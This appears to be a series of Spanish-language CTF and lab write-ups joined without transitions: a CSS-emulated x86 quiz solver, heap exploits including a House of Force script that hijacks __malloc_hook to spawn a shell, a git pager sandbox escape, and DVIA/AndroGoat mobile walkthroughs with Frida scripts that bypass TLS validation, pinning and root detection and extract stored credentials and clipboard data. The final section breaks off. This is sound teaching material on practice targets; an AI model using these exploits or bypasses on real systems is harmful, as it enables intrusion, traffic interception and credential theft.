Overview

Es un reto de web, que mucha gente sacó de primeras (imagino que la IA no tiene mucho problema para resolverlo). El caso es que el autor (sy1vi3), se ha programado un procesador x86 completo en CSS, y se nos carga la página con un programa que implementa un quiz.

Explotación

Dado que el programa implementa un emulador de x86, podemos interpretar los bytes hardcodeados como tales:

@property --m0 {
  syntax: "<integer>";
  initial-value: 204;
  inherits: true;
}
@property --m1 {
  syntax: "<integer>";
  initial-value: 144;
  inherits: true;
}
@property --m2 {
  syntax: "<integer>";
  initial-value: 144;
  inherits: true;
}
[...]
@property --m256 {
  syntax: "<integer>";
  initial-value: 86;
  inherits: true;
}
@property --m257 {
  syntax: "<integer>";
  initial-value: 85;
  inherits: true;
}
@property --m258 {
  syntax: "<integer>";
  initial-value: 137;
  inherits: true;
}
@property --m259 {
  syntax: "<integer>";
  initial-value: 229;
  inherits: true;
}

Esto nos deja un flujo como:

• En 0x301 (769) inicializa varios punteros de funciones/estado. Podemos verlo ya que IP se inicializa ahí:

@property --IP {
  syntax: "<integer>";
  initial-value: 769;
  inherits: true;
}

• Entra al main en 0x248;
• Imprime el banner y las preguntas;
• Lee una respuesta;
• Comprueba longitud;
• Valida con una tabla;
• Repite para las 3 preguntas.

Para simplificar el análisis podemos convertir la memoria a un archivo .bin y analizarlo como un binario x86. Podemos hacerlo con un script en python:

import re

html = open("full.html", "r", encoding="utf-8").read()

pairs = re.findall(
    r'@property\s+--m(\d+)\s*\{[^}]*?initial-value:\s*(\d+);',
    html,
    re.S
)

mem = {int(idx): int(val) for idx, val in pairs}
size = max(mem) + 1

data = bytes(mem.get(i, 0) for i in range(size))

with open("cssvm.bin", "wb") as f:
    f.write(data)

print(f"extraídos {len(mem)} bytes definidos")
print(f"binario escrito en cssvm.bin con tamaño {len(data)} bytes")

Y podemos decompilarlo rápidamente con:

objdump -D -Mintel -b binary -m i8086 cssvm.bin | less

Las cadenas en memoria y las longitudes que exige el programa para las tres preguntas son:

1. Which ocean is the largest? - 7
2. Name an aquatic mammal - 5
3. What's the flag? - 32

Para validar las preguntas se itera una tabla de entradas de 8 bytes. Cada entrada son 4 words de 16 bits:

indice a
indice b
indice c
valor_objetivo t

La condición que se comprueba es:

respuesta[a] ^ (respuesta[b] + respuesta[c]) == t

Con las tablas ya extraídas, resolverlo es bastante directo. En mi caso tiré de un pequeño backtracking con propagación de dominios, restringiendo además el alfabeto a los caracteres que realmente permite el teclado del reto:

0-9
A-Z
_
{}

Un solver sencillo sería algo así:

ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_{}"
CHARSET = set(map(ord, ALPHABET))

def propagate(domains, constraints):
    changed = True
    while changed:
        changed = False

        for a, b, c, t in constraints:
            da, db, dc = domains[a], domains[b], domains[c]

            poss_a = {((x + y) ^ t) & 0xFF for x in db for y in dc}
            poss_b = {((t ^ x) - y) & 0xFF for x in da for y in dc}
            poss_c = {((t ^ x) - y) & 0xFF for x in da for y in db}

            na = da & poss_a
            nb = db & poss_b
            nc = dc & poss_c

            if not na or not nb or not nc:
                return None

            if na != da:
                domains[a] = na
                changed = True
            if nb != db:
                domains[b] = nb
                changed = True
            if nc != dc:
                domains[c] = nc
                changed = True

    return domains

def solve_with_domains(constraints, domains):
    domains = propagate(domains, constraints)
    if domains is None:
        return None

    if all(len(d) == 1 for d in domains):
        return "".join(chr(next(iter(d))) for d in domains)

    idx = min(
        (i for i, d in enumerate(domains) if len(d) > 1),
        key=lambda i: len(domains[i])
    )

    for v in sorted(domains[idx]):
        new_domains = [set(d) for d in domains]
        new_domains[idx] = {v}
        res = solve_with_domains(constraints, new_domains)
        if res is not None:
            return res

    return None

def solve(constraints, length, fixed=None):
    domains = [set(CHARSET) for _ in range(length)]

    if fixed:
        for i, ch in fixed.items():
            domains[i] = {ord(ch)}

    return solve_with_domains(constraints, domains)

print(solve(Q1_TABLE, 7))
print(solve(Q2_TABLE, 5))
print(solve(Q3_TABLE, 32, fixed={0: "R", 1: "S", 2: "{", 31: "}"}))

Y así obtendremos la flag! Un reto bastante chulo, espero que os haya gustado!

Overview

La descripción nos dice:

• Just let it freeee….
• 0xdeadbeef? Nah, w3th4nds is better..
• How much to allocate? 20? 0x20? 0x2000000000000?
• Where is the offset to overwrite?
• ESCAPE

Y se nos entrega un binario que podemos decompilar para ver lo siguiente:

//main
//...
  pvVar1 = malloc(0x26);
  allocated_space = pvVar1;
  *(undefined8 *)((long)pvVar1 + 0x1e) = 0x6665656264616564;
  *(undefined *)((long)pvVar1 + 0x26) = 0;
//...

//road_to_salvation
//...
iVar1 = strcmp((char *)(allocated_space + 0x1e),"w3th4nds");
    if (iVar1 == 0) {
        success(&DAT_00102f98);
        local_48 = 0;
        local_40 = 0;
        local_38 = 0;
        local_30 = 0;
        local_28 = 0;
        local_20 = 0;
        __stream = fopen("flag.txt","r");
//...

Vemos que el programa comienza reservando un bloque y asignando un valor. Existe un menú que nos permite reservar y liberar memoria dinámica y seleccionar una opción que lee el valor que se asignó al principio, en caso de ser w3th4nds, devuelve la flag.

Explotación

En este caso la explotación es muy sencilla. Dado que al liberar memoria, dicho bloque simplemente se almacena en caché, y que podemos reservar memoria. Es posible comenzar liberando el primer bloque y, a continuación, reservar un bloque de igual tamaño sobrescribiendo el valor objetivo.

El script para resolver el reto sería:

#!/usr/bin/env python3
from pwn import *

exe = './rookie_salvation'
remote_addr = "138.197.185.246"
remote_port = 32260

if args.REMOTE:
    p = remote(remote_addr, remote_port)
else:
    p = process(exe)

def menu_choice(n: int):
    p.recvuntil(">")
    p.sendline(str(n).encode())

def reserve(size: int, data: bytes):
    menu_choice(1)
    p.recvuntil(":")
    p.sendline(str(size).encode())
    p.recvuntil(":")
    p.sendline(data)

def free_allocated():
    menu_choice(2)

free_allocated()

payload = b'A'*30 + b'w3th4nds'
reserve(32, payload)

menu_choice(3)

p.interactive()

Y esto sería todo, un ejercicio sencillito para practicar un poco de debugging y conceptos muy báscios de memoria dinámica.

Antes de empezar quiero dar crédito al que está siendo mi maestro en esto del Heap, Max Kamper (autor de ROPEmporium, la primera saga de esta web), dejo el enlace a su perfil de Udemy donde está el curso que estoy siguiendo yo y de donde saco los recursos. Aunque haya decidido explicar los conceptos traducidos aquí, sus explicaciones son mucho más completas y claras, así que si sabes inglés (o koreano) te recomiendo mil veces más comprar su curso.

También voy a asumir que si estás leyendo esto sabes de sobra lo que es un heap, las partes de un binario y como funciona la reserva de memoria dinámica y malloc. Si no lo sabes, ya sabes por dónde empezar.

¿Qué es la House of Force?

Es una vulnerabilidad que aprovecha un Heap Overflow para sobrescribir la cabecera del top chunk, aumentando el campo de tamaño y permitiendo reservas de memoria fuera del espacio de direcciones del heap.

Afecta a versiones de libc por debajo de la 2.28.

Ejemplo de explotación

Para la explotación utilizaremos un programa secillo que nos permite hacer varias reservas de memoria y ver el contenido de una variable target.

./house_of_force

===============
|   HeapLAB   |  House of Force
===============

puts() @ 0x7fd37b46df10
heap @ 0x3b023000

1) malloc 0/4
2) target
3) quit

Si tratamos de utilizar la primera opción y pasar un valor muy grande veremos lo siguiente (utilizando [[pwndbg]]):

===============
|   HeapLAB   |  House of Force
===============

puts() @ 0x7ffff786df10
heap @ 0x603000

1) malloc 0/4
2) target
3) quit
> 1
size: 24
data: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Con Ctl+C podemos detener la ejecución y con vis, ver el heap.

pwndbg> vis

0x603000	0x0000000000000000	0x0000000000000021	........!.......
0x603010	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA
0x603020	0x4141414141414141	0x4141414141414141	AAAAAAAAAAAAAAAA	 <-- Top chunk

Vemos algo interesante, nuestras A han sobrescrito la cabecera del top chunk. Ahora podremos reservar un chunk más grande del tamaño del heap.

Escritura arbitraria

Como hemos visto antes, hay una variable target que tenemos opción de consultar. Utilizando la House of Force, podemos tratar de sobrescribirla.

Para ello utilizaremos [[pwntools]] en el siguiente script:

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Selccion la opcion "malloc", los argumentos son el tamaño y los datos a reservar.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

# Calcula la distncia entre dos direcciones.
def delta(x, y):
    return (0xffffffffffffffff - x) + y

io = start()

# El binario da un leak de libc de la funcion puts(), con estas lineas calculamos la direccion base de libc.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# El binario nos da la direccion base del heap.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

# =-=-=- EXPLOIT -=-=-=

# La variable "heap" contiene el inicio del heap.
info(f"heap: 0x{heap:02x}")

# Los simbolos del programa se acceden mediante "elf.sym.<symbol name>".
info(f"target: 0x{elf.sym.target:02x}")

# Guardamos un bloque lleno de As
malloc(24, b"A"*24)

# Con delta() calculamos la distancia entre heap y main.
info(f"delta between heap & main(): 0x{delta(heap, elf.sym.main):02x}")

# =============================================================================

io.interactive()

Lo primero que debemos hacer es repetir la operación anterior y en la primera llamada a malloc, llenar un bloque y sobrescribir la cabecera del top chunk con 0xffffffffffffffff:

malloc(24, b"A"*24+p64(0xffffffffffffffff))

Ahora podremos reservar la cantidad de memoria que queramos. El siguiente paso es reservar un bloque que quede justo antes de la variable target, para ello utilizamos delta y reservamos otro bloque:

# Tenemos que sumar 0x20 a heap para emepzar a contar a partir del primer bloque que almacenamos (desde el inicio del top chunk)
# De igual forma, restamos 0x20 a la dirección de target para quedarnos a exactamente un bloque de target
distancia = delta(heap+0x20, elf.sym.target)
malloc(distancia, "A")

Podríamos incluir target en el bloque que estamos reservando, pero tendríamos que escribir muchísimos datos hasta llegar a la zona de datos y podríamos sobrescribir algo importante.

Ahora mismo, si ejecutamos esto y vemos la memoria alrededor de target con dq target-16, veremos lo siguiente:

pwndbg> dq target-16
0000000000602000     0000000000000000 0000000000001019
0000000000602010     0058585858585858 0000000000000000
0000000000602020     0000000000000000 0000000000000000
0000000000602030     0000000000000000 0000000000000000

pwndbg> top-chunk
PREV_INUSE
Addr: 0x602000
Size: 0x1018 (with flag bits: 0x1019)

El 0058585858585858 es la variable target y 1019 es el top-chunk, que vemos que empieza justo antes de la variable. Por tanto, si asignamos un bloque más podremos sobrescribir la variable:

malloc(8, "Pwned xdd")

1) malloc 3/4
2) target
3) quit
> $ 2

target: Pwned xd

1) malloc 3/4
2) target
3) quit

El script quedaría así:

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Select the "malloc" option, send size & data.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

# Calculate the "wraparound" distance between two addresses.
def delta(x, y):
    return (0xffffffffffffffff - x) + y

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

# =-=-=- EXAMPLE -=-=-=

# The "heap" variable holds the heap start address.
info(f"heap: 0x{heap:02x}")

# Program symbols are available via "elf.sym.<symbol name>".
info(f"target: 0x{elf.sym.target:02x}")

# The malloc() function chooses option 1 from the menu.
# Its arguments are "size" and "data".
malloc(24, b"Y"*24+p64(0xffffffffffffffff))

distancia = delta(heap+0x20, elf.sym.target-0x20)
info(f"delta entre el top chunk y 0x20 antes de target: {distancia}")

malloc(distancia, b"A")
malloc(8, "Pwned xd")

# =============================================================================

io.interactive()

Ejecución de comandos

Para lograr ejecución de comandos podemos abusar de una característica muy ligada al heap. Se trata de los malloc hooks, es decir un puntero a función en la zona de datos de la libc, que apunta directamente a la función de malloc (se utiliza para proporcionar una manera de utilizar una implementación personalizada de malloc).

Si conseguimos que esta dirección apunte a system (que está disponible en libc), podremos invocar una shell.

En este caso, deberemos calcular la distancia entre el registro malloc_hook y el heap:

distancia = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)

Con eso ya tendríamos el top chunk justo antes del registro, de forma que con una llamada a malloc podremos sobrescribirlo con la dirección de system:

malloc(24, p64(libc.sym.system))

Para llamar a system bastaría con volver a llamar a malloc, pasándole la dirección de un cadena "/bin/sh\0", para conseguir esta dirección, podemos almacenar la cadena en la primera llamada que hicimos a malloc y utilizar heap como dirección, o usar la siguiente línea:

malloc(next(libc.search(b"/bin/sh")), "")

El script completo sería:

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("house_of_force")
libc = ELF(elf.runpath + b"/libc.so.6") # elf.libc broke again

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Select the "malloc" option, send size & data.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

# Calculate the "wraparound" distance between two addresses.
def delta(x, y):
    return (0xffffffffffffffff - x) + y

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

# =-=-=- EXAMPLE -=-=-=

# The "heap" variable holds the heap start address.
info(f"heap: 0x{heap:02x}")

# Program symbols are available via "elf.sym.<symbol name>".
info(f"target: 0x{elf.sym.target:02x}")

# The malloc() function chooses option 1 from the menu.
# Its arguments are "size" and "data".
malloc(24, b"Y"*24+p64(0xffffffffffffffff))

distancia = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)

malloc(distancia, "A")

malloc(24, p64(libc.sym.system))

malloc(next(libc.search(b"/bin/sh")), "")
# =============================================================================

io.interactive()

Overview

La descripción del reto era:

A simple git playground for you to test simple git commands.

Note that everything in the sandbox are either from public releases, distro tarballs, or built from unmodified upstream source with common toolchains under normal architectures. Nothing strange and weird here.

Si echamos un ojo al código, veremos un pequeño bucle en python que nos restringe los comandos que podemos ejecutar. Uno de los que si están disponibles es git.

Exploitation

En este tipo de casos, si conseguimos abrir el pager, que en este caso es Vi, podremos ejecutar comandos escapando las restricciones. Para abrir el pager de git es tan fácil como:

git diff

Tras esto, podemos utilizar un comando como el siguiente para lanzar una shell:

!PAGER='sh -c "exec sh 0<&1"' git -p help

La flag se encuentra en una variable de entorno. Esto no me gustó, ya que estuve un rato buscando un archivo flag, pero tal vez se hizo para que pudiera ser resuelto sin necesida de conseguir una shell interactiva :V

/work # busybox env
FLAG=hitcon{Bu5yb0X_34511y_cR4sH_Wh3N_bu117_w17h_C14Ng?}
[...]

Me gustó bastante el reto, y me parece algo interesate para probar en entornos de sandbox.

Introducción

A diferencia de Android, iOS tiene ciertas particularidades que hacen que simplemente desplegar la aplicación sea un poco más dificil. Dado que un emulador no es exactamente igual, correremos la aplicacion en un dispositivo fisico. En este caso he utilizado un iPhone 8 plus con iOS 16.7.7, aunque deberia funcionar en iOS de 8-9 en adelante.

La version del repo oficial esta compilada para versiones anteriores de iOS. Por tanto, clone el repositorio y con ayuda de xCode (instalado en un Mac) compile e instale la aplicacion.

Cabe recalcar que para la conexion (y para instalar la aplicacion si no quieres utilizar xCode), ademas de para poder instalar las herramientas que utilizaremos para la explotacion, es conveniente aplicar Jailbreak al dispositivo. En mi caso utilice Checkra1n ya que es muy robusto, facil de usar y semi-thetered, es decir, que al reiniciar se deshace el jailbreak.

Al haber utilizado Checkra1n, el sistema de deteccion de Jailbreak no es capaz de detectarlo. Por tanto ya hemos superado el nivel de Jailbreak Detection.

Reconocimiento inicial

Previo a empezar conviene realizar un pequeño reconocimiento para extraer informacion como el identificador de la aplicacion:

frida-ps -U -a -i
 PID  Name                              Identifier                          
----  --------------------------------  ------------------------------------
[...]       
   -  DVIA-v2                           com.naibu3.DVIAswiftv2
[...]

Local Data Storage

La primera vulnerabilidad que vamos a explotar es el almacenamiento inseguro de datos. En cada sub-nivel deberemos generar datos para posteriormente tratar de leerlos externamente.

Plist

En este sub-nivel se nos ofrece la posibilidad de almacenar credenciales en un archivo plist o Property List. Estos archivos almacenan informacion en formato XML, y todas las aplicaciones tienen al menos un Info.plist

Podemos acceder a estos archivos en /var/mobile/Containers/Data/Application/<UUID>/Documents:

juan-manuels-iPhone:/var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Documents root# cat userInfo.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>password</key>
	<string>password</string>
	<key>username</key>
	<string>naibu3</string>
</dict>
</plist>

UserDefaults

En el segundo nivel, la informacion se almacena como NSUserDefaults.

En este caso, tambien se guarda como un plist pero bajo /var/mobile/Containers/Data/Application/<UUID>/Library/Preferences:

juan-manuels-iPhone:/var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Library/Preferences root# cat com.naibu3.DVIAswiftv2.plist
bplist00�YDemoValueoesto es un s�per secreto

Keychain

En este nivel, igual que en los anteriores se nos da la opción de introducir una cadena que se guardará en la keychain.

La keychain es un sistema de almacenamiento seguro que proporciona Apple y sirve para almacenar información sensible como contraseñas, tokens de autenticación, certificados y claves privadas.

TODO

Core Data

En este nivel los datos se almacenan en una base de datos del lado del cliente. En concreto podemos acceder a ella en /var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Library/Application\ Support/Model.sqlite.

Webkit Caching

TODO - Puede que no este funcionando correctamente

Realm

En /var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Documents/default.realm se debe estar guardando la informacion.

TODO

COuchbase Lite

En este cao la info se almacena en /var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Library/Application Support/CouchbaseLite/dvcouchbasedb.cblite2/db.sqlite3.

TODO

YapDatabase

De forma similar a la parte de Core Data, en este sub-nivel la informacion se almacena en una base de datos Yap. Este es un framework que facilita el almacenamiento de informacion en iOS.

Podemos acceder a la base de datos en /var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Library/Application\ Support/YapDatabase.sqlite.

Side Channel Data Leakage

En este nivel trataremos una vulnerabilidad que se da cuando se filtran datos sensibles accidentalmente por parte de la aplicacion.

Device Logs

TODO - Al rellenar el formulario crashea xdd

App Screenshots

Al pasar una aplicacion a segundo plano, se guarda automaticamente una captura de pantalla de la aplicacion para poder mostrarla en la previsualizacion. Si disponemos de un dispositivo rooteado podemos acceder a estas capturas y en ocasiones ver informacion privilegiada.

En este caso debemos introducir una cadena y mandar la aplicacion a segundo plano. Desde ssh (o desde Filza), podemos ver la captura en /var/mobile/Containers/Data/Application/AC6069D0-4CA4-4856-8230-4500DCDD5FA3/Library/SplashBoard/Snapshots.

Pasteboard

Es muy peligroso guardar informacion sensible, como por ejemplo un CVV en la pasteboard. Por tanto no debemos dejar al usuario copiar dicha informacion. En este nivel debemos precisamente copiar dicha informacion.

Posteriormente, con un script de frida como el siguiente podemos extraer el contenido de la pasteboard:

const UIPasteboard = ObjC.classes.UIPasteboard;
const pb = UIPasteboard.generalPasteboard();
console.log("Pasteboard content: " + pb.string().toString());

frida -U -n DVIA-v2 -l paste.js

     ____
    / _  |   Frida 17.2.11 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to iOS Device (id=1af26da7a801875fe87f09d7eaccf75c650d0a8f)
Attaching...                                                            
Pasteboard content: 344

Keystroke logging

iOS por defecto almacena todas las pulsaciones que se hayan introducido en el dispositivo. El objetivo de este sub-nivel es introducir un nombre y capturar esas pulsaciones.

Los archivos deberían estar en /private/var/mobile/Library/Keyboard/ con extension .dat.

Cookies

Muchas aplicaciones almacenan cookies de sesion en /private/var/mobile/Library/Cookies. Si vamos a ese directorio encontraremos un archivo con las credenciales.

Network Layer Security

En esta seccion trataremos de capturar el trafico http que envia la aplicacion.

HTTP

Para la primera parte, deberemos configurar la red para que utilice nuestra maquina en el puerto 8080 como proxy para capturar con BurpSuite.

HTTPS

En el caso de HTTPs, si tratamos de capturar el trafico directamente, recibiremos un error. Esto se debe a que el certificado no es de confianza y al igual que hicimos con la version de Android, debemos añadir el certificado a los certificados de confianza.

HTTP

La primera parte consiste en interceptar tráfico http. Para ello comenzaremos configurando BurpSuite:

Y en las opciones de conexión del móvil especificamos el proxy:

Con todo listo podemos lanzar la petición y verla desde BurpSuite:

Vemos que somos capaces de ver las peticiones.

HTTPS

Cuando tratamos de hacer un MITM a HTTPS, en un navegador veremos un aviso de que la comunicación no es privada. En aplicaiones móviles, no se mostrará el aviso y por tanto no seremos capaces de interceptar nada.

BurpSuite genera certificados autofirmados para los dispositivos a los que se conecta. El problema es que este certificado no es de confianza para android. Para ello debemos asegurarnos de tenerlo instalado, podemos descargarlo si accedemos por un navegador a <IP-Burpsuite>:<Puerto>:

Posibles fallos

En versiones posteriores de la API (a partir de la API 24-Nougat), es posible que no sea posible interceptar las peticiones. Esto se debe al funcionamiento de los certificados, concretamente a partir de esa versión, las propias aplicaciones deben especificar en el network_security_config.xml que cofían explícitamente en el certificado.

Para bypasear esta protección, podemos ó instalar el certificado de burpsuite como un certificado a nivel de sistema. Ó, de forma más simple, modificar la aplicación para incorporar esta configuración. Con algo así sería suficiente:

<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config cleartextTrafficPermitted="true">
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>

Hay una tercera forma de saltar esta protección, mediante frida. Para ello valdría con un script como el siguiente:

if(Java.available)
{
	Java.perform(function () {

    var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');

    TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
		// https://github.com/google/conscrypt/blob/c88f9f55a523f128f0e4dace76a34724bfa1e88c/platform/src/main/java/org/conscrypt/TrustManagerImpl.java#L650 

        console.log(JSON.stringify(untrustedChain));
        return untrustedChain;
    }
});
}
else
{
	console.log("Java not available");
}

Certificate pinning

En la última parte deberemos bypasear una técnica llamada certificate pinning. Esta técnica consiste en “anclar” la confianza de la aplicación a un certificado específico o a un conjunto reducido de certificados concretos, en lugar de confiar en cualquier certificado válido emitido por una autoridad certificadora del sistema.

Igual que antes, podemos parchear el binario, pero con frida y este script debería ser suficiente.

frida -U -N owasp.sat.agoat -l pin.js

Y ahora sí, con esto habríamos completado por completo el AndroGOAT.

Root Detection

El nivel de detección de root nos plantea una interfaz con un botón que al ser pulsado nos reporta si se detectan privilegios de superusuario. El objetivo es saltar esta protección.

Frida

La opción más común es tratar de hookear la función que actúa como detector y evitar que devuelva true. La función es la siguiente (descompilado utilizando jadx) dentro de RootDetectionActivity:

public final boolean isRooted() {
    String[] file = {"/system/app/Superuser/Superuser.apk", "/system/app/Superuser.apk", "/sbin/su", "/system/bin/su", "/system/xbin/su", "/data/local/xbin/su", "/data/local/bin/su", "/system/sd/xbin/su", "/system/bin/failsafe/su", "/data/local/su", "/su/bin/su", "re.robv.android.xposed.installer-1.apk", "/data/app/eu.chainfire.supersu-1/base.apk"};
    boolean result = false;
    for (String files : file) {
        File f = new File(files);
        result = f.exists();
        if (result) {
            break;
        }
    }
    return result;
}

Para bypasearla es tan sencillo como ejecutar el frida-server en el dispositivo:

adb push frida-server /data/local/tmp
adb shell
su
cd /data/local/tmp/
./frida-server

Y lanzar frida con el siguiente script:

Java.perform(function () {
    var RootDetectionActivity = Java.use("owasp.sat.agoat.RootDetectionActivity");

    RootDetectionActivity.isRooted.implementation = function () {
        console.log("[+] isRooted() called - returning false");
        return false;
    };	
});

Así conseguimos que no se nos detecte:

Magisk

Una forma más sencilla es utilizando magisk, esta herramienta nos proporciona una blacklist para seleccionar una serie de aplicaciones a las que se ocultará el root.

adb shell
su
magisk --denylist enable                                                                            
magisk --denylist add owasp.sat.agoat 

Insecure Data Storage

Shared Preferences

En la primera parte se nos ofrece una pantalla para registrar un usuario. SIn embargo, se guarda bajo SharedPreferences, por tanto es posible acceder y verlo en texto plano:

/data/data/owasp.sat.agoat/shared_prefs # cat users.xml                                                                       
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="password">naibupass</string>
    <string name="username">naibu3</string>
</map>

En la segunda parte se nos presenta una puntuación que aumenta al pulsar un botón, sin embargo, también es una preferencia compartida, por tanto podemos modificarla para meter 1000 puntos:

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <int name="score" value="10003" />
    <int name="level" value="2" />
</map>

Es importante que modifiquemos el fichero con la app cerrada, ya que las preferencias se cachean.

Sqlite

De igual forma, en la siguiente parte, las credenciales se guardan en una base de datos. Podemos traerla a nuestra máquina con adb y visualizarla con sqlite.

Tmp File

En este caso se guarda en un archivo temporal creado en la raíz del espacio de nombres de la aplicación.

SDCard

El último nivel guarda los archivos en un tarjeta SD. En mi caso no tenía así que no funcionaba :V

Side Channel Data Leakage

En esta parte veremos como podemos encontrar información que pueda quedar expuesta indirectamente.

Keyboard Cache

OP56CDL1:/data/data/com.google.android.inputmethod.latin/files/personal/userhistory # strings *
0$>a
We love Marisa.
We love Marisa.
a	rkm
@gmail.com
privadi
dekracstesting
@test.c

Insecure Logging

adb logcat | grep -i "Error occured when processing"
07-02 13:44:49.625 11105 11105 E Error:  : Error occured when processing Username naivu3   and Password naivu3
07-02 13:44:49.625 11105 11105 I System.out: Error: Error occured when processing Username naivu3   and Password naivu3
07-02 13:44:50.637 11105 11105 E Error:  : Error occured when processing Username naivu3   and Password naivu3

Clipboard

En este caso se nos dan una vista que nos da copia a la clipboard un OTP al ingresar un número de tarjeta. Esto es peligroso ya que el portapapeles es compartido para todo el sistema. Para interceptarlo podemos utilizar por ejemplo frida:

Java.perform(function() {
    var ClipboardManager = Java.use("android.content.ClipboardManager");
    ClipboardManager.setPrimaryClip.implementation = function(clip) {
        console.log("Clipboard set to: " + clip.getItemAt(0).getText());
        return this.setPrimaryClip(clip);
    };
});

frida -U -N owasp.sat.agoat -l cliper.js

     ____
    / _  |   Frida 17.2.6 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to CPH2437 (id=VOQ4JBEM8L69V8MF)
[CPH2437::owasp.sat.agoat ]-> Clipboard set to: 9886
Clipboard set to: 6521
Clipboard set to: 5162
Clipboard set to: 7104

Input Validations

XSS

Esta sección es vlnerable a XSS:

SQLi

WebView

Unprotected Android Components

OP56CDL1:/data/data/owasp.sat.agoat/shared_prefs # cat pinDetails.xml                                                                  
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <boolean name="pinSet" value="true" />
    <string name="pin">81dc9bdb52d04dc20036dbd8313ed055</string>
</map>

adb shell am start -n owasp.sat.agoat/.AccessControl1ViewActivity
Starting: Intent { cmp=owasp.sat.agoat/.AccessControl1ViewActivity }

Binary Patching

En esta parte queremos acceder a una Funcionalidad de Administración, sin embargo parece estar bloqueada. Para ello lo que haremos será modificar el propio programa para hacerle creer que somos administradores.

Lo primero es extraer los ficheros de la apk:

apktool d AndroGoat.apk

Nos dirijiremos a la carpeta smali, donde se guarda el código como instrucciones Dalvik. Allí podemos acceder a la actividad correspondiente y editar la comprobación de los privilegios:

Una vez modificado podemos recompilar e instalar y voilá, tendremos acceso a la supuesta funcionalidad privilegiada:

Y con esto habríamos terminado de vulnerar la aplicación AndroGoat. Sólo quedaría la parte de interceptar tráfico, pero será cubierta en un post futuro.

Overview

Se nos da una aplicación que a priori detecta si nuestro dispositivo está rooteado, y de ser así nos echa de la aplicación:

Lógicamente podemos evadir este mensaje si no utilizamos un dispositivo rooteado. Sin embargo, intentaremos saltarnos esta protección.

Reconocimiento

Comenzaremos descompilando el programa con jadx, y veremos que se aplican tres comprobaciones que determinan si el dispositivo tiene desbloqueado el superusuario.

public class a {
    public static byte[] a(byte[] bArr, byte[] bArr2) {
        SecretKeySpec secretKeySpec = new SecretKeySpec(bArr, "AES/ECB/PKCS7Padding");
        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(2, secretKeySpec);
        return cipher.doFinal(bArr2);
    }
}

public class b {
    public static boolean a(Context context) {
        return (context.getApplicationContext().getApplicationInfo().flags & 2) != 0;
    }
}

public class c {
    public static boolean a() {
        for (String str : System.getenv("PATH").split(":")) {
            if (new File(str, "su").exists()) {
                return true;
            }
        }
        return false;
    }

    public static boolean b() {
        String str = Build.TAGS;
